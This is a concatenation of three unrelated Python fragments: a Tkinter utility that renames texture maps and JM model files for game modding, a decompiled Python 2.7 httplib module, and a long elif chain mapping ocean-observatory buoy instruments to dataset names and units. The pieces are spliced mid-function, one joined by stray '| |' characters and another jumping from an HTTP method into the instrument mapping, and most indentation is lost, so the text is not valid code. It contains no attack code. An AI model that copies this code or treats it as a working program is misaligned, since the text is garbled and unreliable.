sortedMaps = sort_maps()
if sortedMaps == None:
return
normalMap = sortedMaps[0]
specMap = sortedMaps[1]
diffuseMaps = sortedMaps[2]
# Create a place to store the maps
newPaths = create_directory(root.directory, modelNameEntry.get().lower())
# Create new maps and JMs
copy_maps_to_directory(newPaths[1])
# Rename normal map
if normalMap != None:
rename_map(f"{newPaths[1]}", normalMap, "norm")
# Rename spec map
if specMap != None:
rename_map(f"{newPaths[1]}", specMap, "spec")
# Rename diffuse maps
if len(diffuseMaps) > 0:
for item in diffuseMaps:
rename_map(f"{newPaths[1]}", item, "none")
def rename_jm_files():
# Check to see if jms lb has items in them
jmsLbPopulated = jmListbox.get(0)
if not jmsLbPopulated:
print("You need to choose a directory that has jms...")
return
# Check to see if the model name entry is blank
if modelNameEntry.get().lower() == "":
print("You need to supply a model name...")
return
# Check to see if a dyno is selected
if not dynoListbox.curselection():
print("You need to select a dyno...")
return
# Get paths for new JMs
newPaths = create_directory(root.directory, modelNameEntry.get().lower())
# Copy jms to new directory
copy_jms_to_directory(newPaths[2])
# Rename all of the JMs
for jm in jmListbox.get(0, END):
rename_jm(newPaths[2], jm)
def copy_maps_to_directory(directory):
    for item in skinsListbox.get(0, END):
        shutil.copyfile(f"{root.directory}/{item}", f"{directory}/{item}")
def copy_jms_to_directory(directory):
for item in jmListbox.get(0, END):
shutil.copyfile(f"{root.directory}/{item}", f"{directory}/{item}")
def copy_files_to_directory(currentDirectory, copyToDirectory, fileExtensions = ""):
for f in listdir(currentDirectory):
        filepath = join(currentDirectory, f)
if isfile(filepath):
if fileExtensions == "":
shutil.copyfile(f"{currentDirectory}/{f}", f"{copyToDirectory}/{f}")
else:
includedExtensions = 0
for ext in fileExtensions:
if ext in filepath:
includedExtensions += 1
if len(fileExtensions) > 1 and includedExtensions == 2:
shutil.copyfile(f"{currentDirectory}/{f}", f"{copyToDirectory}/{f}")
elif len(fileExtensions) == 1:
shutil.copyfile(f"{currentDirectory}/{f}", f"{copyToDirectory}/{f}")
def rename_map(directory, map, special):
# Check to see if map halfway named
filename = None
if "-" in map:
splitName = map.rsplit("-", 1)
trim = messagebox.askyesno(
f"Do you want to trim after the '-' in {map}?", f"Not used: {splitName[0]}-, Used: {splitName[1]}")
if trim == True:
filename = splitName[1]
else:
filename = map
else:
filename = map
dynoSelection = dynoListbox.selection_get()
dynoValue = None
for item in dynosList:
if dynoSelection == item:
dynoValue = dynosList[dynoSelection]
output = None
if special == "norm":
output = f"{directory}/{dynoValue}-{modelNameEntry.get().lower()}_norm.png"
try:
os.rename(f"{directory}/{map}", output)
except OSError as e:
os.remove(output)
os.rename(f"{directory}/{map}", output)
elif special == "spec":
output = f"{directory}/{dynoValue}-{modelNameEntry.get().lower()}_spec.png"
try:
os.rename(f"{directory}/{map}", output)
except OSError as e:
os.remove(output)
os.rename(f"{directory}/{map}", output)
else:
output = f"{directory}/{dynoValue}-{modelNameEntry.get().lower()}-{filename}"
try:
os.rename(f"{directory}/{map}", output)
except OSError as e:
os.remove(output)
os.rename(f"{directory}/{map}", output)
def rename_jm(directory, jm):
# Get the selected dyno
dynoSelection = dynoListbox.selection_get()
dynoValue = None
for item in dynosList:
if dynoSelection == item:
dynoValue = dynosList[dynoSelection]
# Extract JM type
jmType = None
for type in jmParts:
if type.lower() == "wheels":
saveDir = f"{directory}"
filename = None
if "front_wheel" in jm.lower():
filename = f"front_wheel-{modelNameEntry.get().lower()}.jm"
elif "rear_wheel" in jm.lower():
filename = f"rear_wheel-{modelNameEntry.get().lower()}.jm"
else:
continue
            # If the file already exists, delete it first: os.rename raises on
            # Windows when the destination exists (macOS and Linux overwrite)
if os.path.exists(f"{saveDir}/{filename}"):
os.remove(f"{saveDir}/{filename}")
# Rename the jm file
os.rename(f"{saveDir}/{jm}", f"{saveDir}/{filename}")
else:
# Cast to lowercase just in case the JM is saved weird
if type.lower() in jm.lower():
jmType = type
saveDir = f"{directory}"
filename = f"{dynoValue}_{jmType}-{modelNameEntry.get().lower()}.jm"
# Change file name to only dyno and model name if rider or wheels
if jmType.lower() == "rider_body" or jmType.lower() == "rider_head":
filename = f"{dynoValue}-{modelNameEntry.get().lower()}.jm"
                # If the file already exists, delete it first: os.rename raises on
                # Windows when the destination exists (macOS and Linux overwrite)
if os.path.exists(f"{saveDir}/{filename}"):
os.remove(f"{saveDir}/{filename}")
# Rename the jm file
os.rename(f"{saveDir}/{jm}", f"{saveDir}/{filename}")
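# Naming sketch (hypothetical inputs): with dyno "Honda (450f)" (dynoValue
# "crf450v2017"), model name "mydesign" and a JM containing "frame", the file
# becomes "crf450v2017_frame-mydesign.jm"; rider_body/rider_head JMs collapse
# to "crf450v2017-mydesign.jm", and wheel JMs keep their front_wheel/rear_wheel
# prefix, e.g. "front_wheel-mydesign.jm".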
def saf_all():
run_saf_files(0)
def saf_maps():
run_saf_files(1)
def saf_jms():
run_saf_files(2)
def run_saf_files(typeIndex):
# Change into working directory just to be safe
os.chdir(workingDirectory)
# Check to see if the model name is empty
if modelNameEntry.get().lower() == "":
print("SAF Files: You need to supply a model name to saf your files...")
return
else:
# Check to see if there is a root directory
if root.directory == None:
print("SAF Files: You need to supply a directory...")
return
else:
# Make TEMP folder in plugins
if not path.exists("plugins/TEMP"):
os.makedirs("plugins/TEMP")
print("SAF Files: Created temp export directory...")
# Copy all necessary files to the temp folder
renamedFilesDirectory = f"{root.directory}/RenamedFiles"
subDirs = os.listdir(renamedFilesDirectory)
modelDir = None
# Get all the sub-directories and set modelDir if | |
# uncompyle6 version 3.2.4
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.15 (v2.7.15:ca079a3ea3, Apr 30 2018, 16:30:26) [MSC v.1500 64 bit (AMD64)]
# Embedded file name: httplib
from array import array
import os, socket
from sys import py3kwarning
from urlparse import urlsplit
import warnings
with warnings.catch_warnings():
if py3kwarning:
warnings.filterwarnings('ignore', '.*mimetools has been removed', DeprecationWarning)
import mimetools
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
__all__ = [
'HTTP', 'HTTPResponse', 'HTTPConnection',
'HTTPException', 'NotConnected', 'UnknownProtocol',
'UnknownTransferEncoding', 'UnimplementedFileMode',
'IncompleteRead', 'InvalidURL', 'ImproperConnectionState',
'CannotSendRequest', 'CannotSendHeader', 'ResponseNotReady',
'BadStatusLine', 'error', 'responses']
HTTP_PORT = 80
HTTPS_PORT = 443
_UNKNOWN = 'UNKNOWN'
_CS_IDLE = 'Idle'
_CS_REQ_STARTED = 'Request-started'
_CS_REQ_SENT = 'Request-sent'
CONTINUE = 100
SWITCHING_PROTOCOLS = 101
PROCESSING = 102
OK = 200
CREATED = 201
ACCEPTED = 202
NON_AUTHORITATIVE_INFORMATION = 203
NO_CONTENT = 204
RESET_CONTENT = 205
PARTIAL_CONTENT = 206
MULTI_STATUS = 207
IM_USED = 226
MULTIPLE_CHOICES = 300
MOVED_PERMANENTLY = 301
FOUND = 302
SEE_OTHER = 303
NOT_MODIFIED = 304
USE_PROXY = 305
TEMPORARY_REDIRECT = 307
BAD_REQUEST = 400
UNAUTHORIZED = 401
PAYMENT_REQUIRED = 402
FORBIDDEN = 403
NOT_FOUND = 404
METHOD_NOT_ALLOWED = 405
NOT_ACCEPTABLE = 406
PROXY_AUTHENTICATION_REQUIRED = 407
REQUEST_TIMEOUT = 408
CONFLICT = 409
GONE = 410
LENGTH_REQUIRED = 411
PRECONDITION_FAILED = 412
REQUEST_ENTITY_TOO_LARGE = 413
REQUEST_URI_TOO_LONG = 414
UNSUPPORTED_MEDIA_TYPE = 415
REQUESTED_RANGE_NOT_SATISFIABLE = 416
EXPECTATION_FAILED = 417
UNPROCESSABLE_ENTITY = 422
LOCKED = 423
FAILED_DEPENDENCY = 424
UPGRADE_REQUIRED = 426
INTERNAL_SERVER_ERROR = 500
NOT_IMPLEMENTED = 501
BAD_GATEWAY = 502
SERVICE_UNAVAILABLE = 503
GATEWAY_TIMEOUT = 504
HTTP_VERSION_NOT_SUPPORTED = 505
INSUFFICIENT_STORAGE = 507
NOT_EXTENDED = 510
responses = {100: 'Continue',
101: 'Switching Protocols',
200: 'OK',
201: 'Created',
202: 'Accepted',
203: 'Non-Authoritative Information',
204: 'No Content',
205: 'Reset Content',
206: 'Partial Content',
300: 'Multiple Choices',
301: 'Moved Permanently',
302: 'Found',
303: 'See Other',
304: 'Not Modified',
305: 'Use Proxy',
306: '(Unused)',
307: 'Temporary Redirect',
400: 'Bad Request',
401: 'Unauthorized',
402: 'Payment Required',
403: 'Forbidden',
404: 'Not Found',
405: 'Method Not Allowed',
406: 'Not Acceptable',
407: 'Proxy Authentication Required',
408: 'Request Timeout',
409: 'Conflict',
410: 'Gone',
411: 'Length Required',
412: 'Precondition Failed',
413: 'Request Entity Too Large',
414: 'Request-URI Too Long',
415: 'Unsupported Media Type',
416: 'Requested Range Not Satisfiable',
417: 'Expectation Failed',
500: 'Internal Server Error',
501: 'Not Implemented',
502: 'Bad Gateway',
503: 'Service Unavailable',
504: 'Gateway Timeout',
505: 'HTTP Version Not Supported'}
MAXAMOUNT = 1048576
_MAXLINE = 65536
class HTTPMessage(mimetools.Message):
def addheader(self, key, value):
prev = self.dict.get(key)
if prev is None:
self.dict[key] = value
else:
combined = (', ').join((prev, value))
self.dict[key] = combined
return
def addcontinue(self, key, more):
prev = self.dict[key]
self.dict[key] = prev + '\n ' + more
def readheaders(self):
self.dict = {}
self.unixfrom = ''
self.headers = hlist = []
self.status = ''
headerseen = ''
firstline = 1
startofline = unread = tell = None
if hasattr(self.fp, 'unread'):
unread = self.fp.unread
else:
if self.seekable:
tell = self.fp.tell
while True:
if tell:
try:
startofline = tell()
except IOError:
startofline = tell = None
self.seekable = 0
line = self.fp.readline(_MAXLINE + 1)
if len(line) > _MAXLINE:
raise LineTooLong('header line')
if not line:
self.status = 'EOF in headers'
break
if firstline and line.startswith('From '):
self.unixfrom = self.unixfrom + line
continue
firstline = 0
if headerseen and line[0] in ' \t':
hlist.append(line)
self.addcontinue(headerseen, line.strip())
continue
else:
if self.iscomment(line):
continue
else:
if self.islast(line):
break
headerseen = self.isheader(line)
if headerseen:
hlist.append(line)
self.addheader(headerseen, line[len(headerseen) + 1:].strip())
continue
else:
if not self.dict:
self.status = 'No headers'
else:
self.status = 'Non-header line where header expected'
if unread:
unread(line)
else:
if tell:
self.fp.seek(startofline)
else:
self.status = self.status + '; bad seek'
break
return
class HTTPResponse():
def __init__(self, sock, debuglevel=0, strict=0, method=None, buffering=False):
if buffering:
self.fp = sock.makefile('rb')
else:
self.fp = sock.makefile('rb', 0)
self.debuglevel = debuglevel
self.strict = strict
self._method = method
self.msg = None
self.version = _UNKNOWN
self.status = _UNKNOWN
self.reason = _UNKNOWN
self.chunked = _UNKNOWN
self.chunk_left = _UNKNOWN
self.length = _UNKNOWN
self.will_close = _UNKNOWN
return
def _read_status(self):
line = self.fp.readline(_MAXLINE + 1)
if len(line) > _MAXLINE:
raise LineTooLong('header line')
if self.debuglevel > 0:
print 'reply:', repr(line)
if not line:
raise BadStatusLine(line)
try:
version, status, reason = line.split(None, 2)
except ValueError:
try:
version, status = line.split(None, 1)
reason = ''
except ValueError:
version = ''
if not version.startswith('HTTP/'):
if self.strict:
self.close()
raise BadStatusLine(line)
else:
self.fp = LineAndFileWrapper(line, self.fp)
return ('HTTP/0.9', 200, '')
try:
status = int(status)
if status < 100 or status > 999:
raise BadStatusLine(line)
except ValueError:
raise BadStatusLine(line)
return (version, status, reason)
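    # Example (illustrative): 'HTTP/1.1 200 OK\r\n' parses to
    # ('HTTP/1.1', 200, 'OK\r\n') (the reason is stripped later in begin());
    # a non-HTTP first line from an HTTP/0.9 server is pushed back onto the
    # stream and reported as ('HTTP/0.9', 200, '').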
def begin(self):
if self.msg is not None:
return
while True:
version, status, reason = self._read_status()
if status != CONTINUE:
break
while True:
skip = self.fp.readline(_MAXLINE + 1)
if len(skip) > _MAXLINE:
raise LineTooLong('header line')
skip = skip.strip()
if not skip:
break
if self.debuglevel > 0:
print 'header:', skip
self.status = status
self.reason = reason.strip()
if version == 'HTTP/1.0':
self.version = 10
else:
if version.startswith('HTTP/1.'):
self.version = 11
else:
if version == 'HTTP/0.9':
self.version = 9
else:
raise UnknownProtocol(version)
if self.version == 9:
self.length = None
self.chunked = 0
self.will_close = 1
self.msg = HTTPMessage(StringIO())
return
self.msg = HTTPMessage(self.fp, 0)
if self.debuglevel > 0:
for hdr in self.msg.headers:
print 'header:', hdr,
self.msg.fp = None
tr_enc = self.msg.getheader('transfer-encoding')
if tr_enc and tr_enc.lower() == 'chunked':
self.chunked = 1
self.chunk_left = None
else:
self.chunked = 0
self.will_close = self._check_close()
length = self.msg.getheader('content-length')
if length and not self.chunked:
try:
self.length = int(length)
except ValueError:
self.length = None
else:
if self.length < 0:
self.length = None
else:
self.length = None
if status == NO_CONTENT or status == NOT_MODIFIED or 100 <= status < 200 or self._method == 'HEAD':
self.length = 0
if not self.will_close and not self.chunked and self.length is None:
self.will_close = 1
return
def _check_close(self):
conn = self.msg.getheader('connection')
if self.version == 11:
conn = self.msg.getheader('connection')
if conn and 'close' in conn.lower():
return True
return False
if self.msg.getheader('keep-alive'):
return False
if conn and 'keep-alive' in conn.lower():
return False
pconn = self.msg.getheader('proxy-connection')
if pconn and 'keep-alive' in pconn.lower():
return False
return True
def close(self):
if self.fp:
self.fp.close()
self.fp = None
return
def isclosed(self):
return self.fp is None
def read(self, amt=None):
if self.fp is None:
return ''
if self._method == 'HEAD':
self.close()
return ''
if self.chunked:
return self._read_chunked(amt)
if amt is None:
if self.length is None:
s = self.fp.read()
else:
try:
s = self._safe_read(self.length)
except IncompleteRead:
self.close()
raise
self.length = 0
self.close()
return s
if self.length is not None:
if amt > self.length:
amt = self.length
s = self.fp.read(amt)
if not s:
self.close()
if self.length is not None:
self.length -= len(s)
if not self.length:
self.close()
return s
def _read_chunked(self, amt):
chunk_left = self.chunk_left
value = []
while True:
if chunk_left is None:
line = self.fp.readline(_MAXLINE + 1)
if len(line) > _MAXLINE:
raise LineTooLong('chunk size')
i = line.find(';')
if i >= 0:
line = line[:i]
try:
chunk_left = int(line, 16)
except ValueError:
self.close()
raise IncompleteRead(('').join(value))
if chunk_left == 0:
break
if amt is None:
value.append(self._safe_read(chunk_left))
else:
if amt < chunk_left:
value.append(self._safe_read(amt))
self.chunk_left = chunk_left - amt
return ('').join(value)
if amt == chunk_left:
value.append(self._safe_read(amt))
self._safe_read(2)
self.chunk_left = None
return ('').join(value)
value.append(self._safe_read(chunk_left))
amt -= chunk_left
self._safe_read(2)
chunk_left = None
while True:
line = self.fp.readline(_MAXLINE + 1)
if len(line) > _MAXLINE:
raise LineTooLong('trailer line')
if not line:
break
if line == '\r\n':
break
self.close()
return ('').join(value)
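    # Example of the wire format handled above (illustrative):
    #   '5\r\nhello\r\n6\r\n world\r\n0\r\n\r\n'  ->  'hello world'
    # Each chunk is a hex size line, the payload, and a trailing CRLF; a zero
    # size ends the body, followed by optional trailer lines.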
def _safe_read(self, amt):
s = []
while amt > 0:
chunk = self.fp.read(min(amt, MAXAMOUNT))
if not chunk:
raise IncompleteRead(('').join(s), amt)
s.append(chunk)
amt -= len(chunk)
return ('').join(s)
def fileno(self):
return self.fp.fileno()
def getheader(self, name, default=None):
if self.msg is None:
raise ResponseNotReady()
return self.msg.getheader(name, default)
def getheaders(self):
if self.msg is None:
raise ResponseNotReady()
return self.msg.items()
class HTTPConnection():
_http_vsn = 11
_http_vsn_str = 'HTTP/1.1'
response_class = HTTPResponse
default_port = HTTP_PORT
auto_open = 1
debuglevel = 0
strict = 0
def __init__(self, host, port=None, strict=None, timeout=socket._GLOBAL_DEFAULT_TIMEOUT, source_address=None):
self.timeout = timeout
self.source_address = source_address
self.sock = None
self._buffer = []
self.__response = None
self.__state = _CS_IDLE
self._method = None
self._tunnel_host = None
self._tunnel_port = None
self._tunnel_headers = {}
self._set_hostport(host, port)
if strict is not None:
self.strict = strict
return
def set_tunnel(self, host, port=None, headers=None):
self._tunnel_host = host
        self._tunnel_port = port
    elif platform_name == 'CE01ISSM' and node == 'BUOY' and instrument_class == 'MOPAK' and method == 'RecoveredHost':
uframe_dataset_name = 'CE01ISSM/SBD17/01-MOPAK0000/recovered_host/mopak_o_dcl_accel_recovered'
var_list[0].name = 'time'
var_list[0].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
elif platform_name == 'CE02SHSM' and node == 'BUOY' and instrument_class == 'MOPAK' and method == 'RecoveredHost':
uframe_dataset_name = 'CE02SHSM/SBD11/01-MOPAK0000/recovered_host/mopak_o_dcl_accel_recovered'
var_list[0].name = 'time'
var_list[0].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
elif platform_name == 'CE04OSSM' and node == 'BUOY' and instrument_class == 'MOPAK' and method == 'RecoveredHost':
uframe_dataset_name = 'CE04OSSM/SBD11/01-MOPAK0000/recovered_host/mopak_o_dcl_accel_recovered'
var_list[0].name = 'time'
var_list[0].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
elif platform_name == 'CE06ISSM' and node == 'BUOY' and instrument_class == 'MOPAK' and method == 'RecoveredHost':
uframe_dataset_name = 'CE06ISSM/SBD17/01-MOPAK0000/recovered_host/mopak_o_dcl_accel_recovered'
var_list[0].name = 'time'
var_list[0].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
elif platform_name == 'CE07SHSM' and node == 'BUOY' and instrument_class == 'MOPAK' and method == 'RecoveredHost':
uframe_dataset_name = 'CE07SHSM/SBD11/01-MOPAK0000/recovered_host/mopak_o_dcl_accel_recovered'
var_list[0].name = 'time'
var_list[0].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
elif platform_name == 'CE09OSSM' and node == 'BUOY' and instrument_class == 'MOPAK' and method == 'RecoveredHost':
uframe_dataset_name = 'CE09OSSM/SBD11/01-MOPAK0000/recovered_host/mopak_o_dcl_accel_recovered'
var_list[0].name = 'time'
var_list[0].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
elif platform_name == 'CE09OSPM' and node == 'BUOY' and instrument_class == 'MOPAK' and method == 'RecoveredHost':
uframe_dataset_name = 'CE09OSPM/SBS01/01-MOPAK0000/recovered_host/mopak_o_dcl_accel_recovered'
var_list[0].name = 'time'
var_list[0].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
#METBK
elif platform_name == 'CE02SHSM' and node == 'BUOY' and instrument_class == 'METBK1' and method == 'RecoveredHost':
uframe_dataset_name = 'CE02SHSM/SBD11/06-METBKA000/recovered_host/metbk_a_dcl_instrument_recovered'
var_list[0].name = 'time'
var_list[1].name = 'sea_surface_temperature'
var_list[2].name = 'sea_surface_conductivity'
var_list[3].name = 'met_salsurf'
var_list[4].name = 'met_windavg_mag_corr_east'
var_list[5].name = 'met_windavg_mag_corr_north'
var_list[6].name = 'barometric_pressure'
var_list[7].name = 'air_temperature'
var_list[8].name = 'relative_humidity'
var_list[9].name = 'longwave_irradiance'
var_list[10].name = 'shortwave_irradiance'
var_list[11].name = 'precipitation'
var_list[12].name = 'met_heatflx_minute'
var_list[13].name = 'met_latnflx_minute'
var_list[14].name = 'met_netlirr_minute'
var_list[15].name = 'met_sensflx_minute'
var_list[16].name = 'eastward_velocity'
var_list[17].name = 'northward_velocity'
var_list[18].name = 'met_spechum'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[3].data = np.array([])
var_list[4].data = np.array([])
var_list[5].data = np.array([])
var_list[6].data = np.array([])
var_list[7].data = np.array([])
var_list[8].data = np.array([])
var_list[9].data = np.array([])
var_list[10].data = np.array([])
var_list[11].data = np.array([])
var_list[12].data = np.array([])
var_list[13].data = np.array([])
var_list[14].data = np.array([])
var_list[15].data = np.array([])
var_list[16].data = np.array([])
var_list[17].data = np.array([])
var_list[18].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'degC'
var_list[2].units = 'S/m'
var_list[3].units = 'unitless'
var_list[4].units = 'm/s'
var_list[5].units = 'm/s'
var_list[6].units = 'mbar'
var_list[7].units = 'degC'
var_list[8].units = '#'
var_list[9].units = 'W/m'
var_list[10].units = 'W/m'
var_list[11].units = 'mm'
var_list[12].units = 'W/m'
var_list[13].units = 'W/m'
var_list[14].units = 'W/m'
var_list[15].units = 'W/m'
var_list[16].units = 'm/s'
var_list[17].units = 'm/s'
var_list[18].units = 'g/kg'
elif platform_name == 'CE04OSSM' and node == 'BUOY' and instrument_class == 'METBK1' and method == 'RecoveredHost':
uframe_dataset_name = 'CE04OSSM/SBD11/06-METBKA000/recovered_host/metbk_a_dcl_instrument_recovered'
var_list[0].name = 'time'
var_list[1].name = 'sea_surface_temperature'
var_list[2].name = 'sea_surface_conductivity'
var_list[3].name = 'met_salsurf'
var_list[4].name = 'met_windavg_mag_corr_east'
var_list[5].name = 'met_windavg_mag_corr_north'
var_list[6].name = 'barometric_pressure'
var_list[7].name = 'air_temperature'
var_list[8].name = 'relative_humidity'
var_list[9].name = 'longwave_irradiance'
var_list[10].name = 'shortwave_irradiance'
var_list[11].name = 'precipitation'
var_list[12].name = 'met_heatflx_minute'
var_list[13].name = 'met_latnflx_minute'
var_list[14].name = 'met_netlirr_minute'
var_list[15].name = 'met_sensflx_minute'
var_list[16].name = 'eastward_velocity'
var_list[17].name = 'northward_velocity'
var_list[18].name = 'met_spechum'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[3].data = np.array([])
var_list[4].data = np.array([])
var_list[5].data = np.array([])
var_list[6].data = np.array([])
var_list[7].data = np.array([])
var_list[8].data = np.array([])
var_list[9].data = np.array([])
var_list[10].data = np.array([])
var_list[11].data = np.array([])
var_list[12].data = np.array([])
var_list[13].data = np.array([])
var_list[14].data = np.array([])
var_list[15].data = np.array([])
var_list[16].data = np.array([])
var_list[17].data = np.array([])
var_list[18].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'degC'
var_list[2].units = 'S/m'
var_list[3].units = 'unitless'
var_list[4].units = 'm/s'
var_list[5].units = 'm/s'
var_list[6].units = 'mbar'
var_list[7].units = 'degC'
var_list[8].units = '#'
var_list[9].units = 'W/m'
var_list[10].units = 'W/m'
var_list[11].units = 'mm'
var_list[12].units = 'W/m'
var_list[13].units = 'W/m'
var_list[14].units = 'W/m'
var_list[15].units = 'W/m'
var_list[16].units = 'm/s'
var_list[17].units = 'm/s'
var_list[18].units = 'g/kg'
elif platform_name == 'CE07SHSM' and node == 'BUOY' and instrument_class == 'METBK1' and method == 'RecoveredHost':
uframe_dataset_name = 'CE07SHSM/SBD11/06-METBKA000/recovered_host/metbk_a_dcl_instrument_recovered'
var_list[0].name = 'time'
var_list[1].name = 'sea_surface_temperature'
var_list[2].name = 'sea_surface_conductivity'
var_list[3].name = 'met_salsurf'
var_list[4].name = 'met_windavg_mag_corr_east'
var_list[5].name = 'met_windavg_mag_corr_north'
var_list[6].name = 'barometric_pressure'
var_list[7].name = 'air_temperature'
var_list[8].name = 'relative_humidity'
var_list[9].name = 'longwave_irradiance'
var_list[10].name = 'shortwave_irradiance'
var_list[11].name = 'precipitation'
var_list[12].name = 'met_heatflx_minute'
var_list[13].name = 'met_latnflx_minute'
var_list[14].name = 'met_netlirr_minute'
var_list[15].name = 'met_sensflx_minute'
var_list[16].name = 'eastward_velocity'
var_list[17].name = 'northward_velocity'
var_list[18].name = 'met_spechum'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[3].data = np.array([])
var_list[4].data = np.array([])
var_list[5].data = np.array([])
var_list[6].data = np.array([])
var_list[7].data = np.array([])
var_list[8].data = np.array([])
var_list[9].data = np.array([])
var_list[10].data = np.array([])
var_list[11].data = np.array([])
var_list[12].data = np.array([])
var_list[13].data = np.array([])
var_list[14].data = np.array([])
var_list[15].data = np.array([])
var_list[16].data = np.array([])
var_list[17].data = np.array([])
var_list[18].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'degC'
var_list[2].units = 'S/m'
var_list[3].units = 'unitless'
var_list[4].units = 'm/s'
var_list[5].units = 'm/s'
var_list[6].units = 'mbar'
var_list[7].units = 'degC'
var_list[8].units = '#'
var_list[9].units = 'W/m'
var_list[10].units = 'W/m'
var_list[11].units = 'mm'
var_list[12].units = 'W/m'
var_list[13].units = 'W/m'
var_list[14].units = 'W/m'
var_list[15].units = 'W/m'
var_list[16].units = 'm/s'
var_list[17].units = 'm/s'
var_list[18].units = 'g/kg'
elif platform_name == 'CE09OSSM' and node == 'BUOY' and instrument_class == 'METBK1' and method == 'RecoveredHost':
uframe_dataset_name = 'CE09OSSM/SBD11/06-METBKA000/recovered_host/metbk_a_dcl_instrument_recovered'
var_list[0].name = 'time'
var_list[1].name = 'sea_surface_temperature'
var_list[2].name = 'sea_surface_conductivity'
var_list[3].name = 'met_salsurf'
var_list[4].name = 'met_windavg_mag_corr_east'
var_list[5].name = 'met_windavg_mag_corr_north'
var_list[6].name = 'barometric_pressure'
var_list[7].name = 'air_temperature'
var_list[8].name = 'relative_humidity'
var_list[9].name = 'longwave_irradiance'
var_list[10].name = 'shortwave_irradiance'
var_list[11].name = 'precipitation'
var_list[12].name = 'met_heatflx_minute'
var_list[13].name = 'met_latnflx_minute'
var_list[14].name = 'met_netlirr_minute'
var_list[15].name = 'met_sensflx_minute'
var_list[16].name = 'eastward_velocity'
var_list[17].name = 'northward_velocity'
var_list[18].name = 'met_spechum'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[3].data = np.array([])
var_list[4].data = np.array([])
var_list[5].data = np.array([])
var_list[6].data = np.array([])
var_list[7].data = np.array([])
var_list[8].data = np.array([])
var_list[9].data = np.array([])
var_list[10].data = np.array([])
var_list[11].data = np.array([])
var_list[12].data = np.array([])
var_list[13].data = np.array([])
var_list[14].data = np.array([])
var_list[15].data = np.array([])
var_list[16].data = np.array([])
var_list[17].data = np.array([])
var_list[18].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'degC'
var_list[2].units = 'S/m'
var_list[3].units = 'unitless'
var_list[4].units = 'm/s'
var_list[5].units = 'm/s'
var_list[6].units = 'mbar'
var_list[7].units = 'degC'
var_list[8].units = '#'
var_list[9].units = 'W/m'
var_list[10].units = 'W/m'
var_list[11].units = 'mm'
var_list[12].units = 'W/m'
var_list[13].units = 'W/m'
var_list[14].units = 'W/m'
var_list[15].units = 'W/m'
var_list[16].units = 'm/s'
var_list[17].units = 'm/s'
var_list[18].units = 'g/kg'
#FLORT
elif platform_name == 'CE01ISSM' and node == 'NSIF' and instrument_class == 'FLORT' and method == 'RecoveredHost':
uframe_dataset_name = 'CE01ISSM/RID16/02-FLORTD000/recovered_host/flort_sample'
var_list[0].name = 'time'
var_list[1].name = 'seawater_scattering_coefficient'
var_list[2].name = 'fluorometric_chlorophyll_a'
var_list[3].name = 'fluorometric_cdom'
var_list[4].name = 'total_volume_scattering_coefficient'
var_list[5].name = 'optical_backscatter'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[3].data = np.array([])
var_list[4].data = np.array([])
var_list[5].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'm-1'
var_list[2].units = 'ug/L'
var_list[3].units = 'ppb'
var_list[4].units = 'm-1 sr-1'
var_list[5].units = 'm-1'
elif platform_name == 'CE01ISSM' and node == 'BUOY' and instrument_class == 'FLORT' and method == 'RecoveredHost':
uframe_dataset_name = 'CE01ISSM/SBD17/06-FLORTD000/recovered_host/flort_sample'
var_list[0].name = 'time'
var_list[1].name = 'seawater_scattering_coefficient'
var_list[2].name = 'fluorometric_chlorophyll_a'
var_list[3].name = 'fluorometric_cdom'
var_list[4].name = 'total_volume_scattering_coefficient'
var_list[5].name = 'optical_backscatter'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[3].data = np.array([])
var_list[4].data = np.array([])
var_list[5].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'm-1'
var_list[2].units = 'ug/L'
var_list[3].units = 'ppb'
var_list[4].units = 'm-1 sr-1'
var_list[5].units = 'm-1'
elif platform_name == 'CE06ISSM' and node == 'NSIF' and instrument_class == 'FLORT' and method == 'RecoveredHost':
uframe_dataset_name = 'CE06ISSM/RID16/02-FLORTD000/recovered_host/flort_sample'
var_list[0].name = 'time'
var_list[1].name = 'seawater_scattering_coefficient'
var_list[2].name = 'fluorometric_chlorophyll_a'
var_list[3].name = 'fluorometric_cdom'
var_list[4].name = 'total_volume_scattering_coefficient'
var_list[5].name = 'optical_backscatter'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[3].data = np.array([])
var_list[4].data = np.array([])
var_list[5].data = np.array([])
var_list[0].units = 'seconds since 1900-01-01'
var_list[1].units = 'm-1'
var_list[2].units = 'ug/L'
var_list[3].units = 'ppb'
var_list[4].units = 'm-1 sr-1'
var_list[5].units = 'm-1'
elif platform_name == 'CE06ISSM' and node == 'BUOY' and instrument_class == 'FLORT' and method == 'RecoveredHost':
uframe_dataset_name = 'CE06ISSM/SBD17/06-FLORTD000/recovered_host/flort_sample'
var_list[0].name = 'time'
var_list[1].name = 'seawater_scattering_coefficient'
var_list[2].name = 'fluorometric_chlorophyll_a'
var_list[3].name = 'fluorometric_cdom'
var_list[4].name = 'total_volume_scattering_coefficient'
var_list[5].name = 'optical_backscatter'
var_list[0].data = np.array([])
var_list[1].data = np.array([])
var_list[2].data = np.array([])
var_list[3].data = np.array([])
var_list[4].data = np.array([])
var_list[5].data = np.array([])
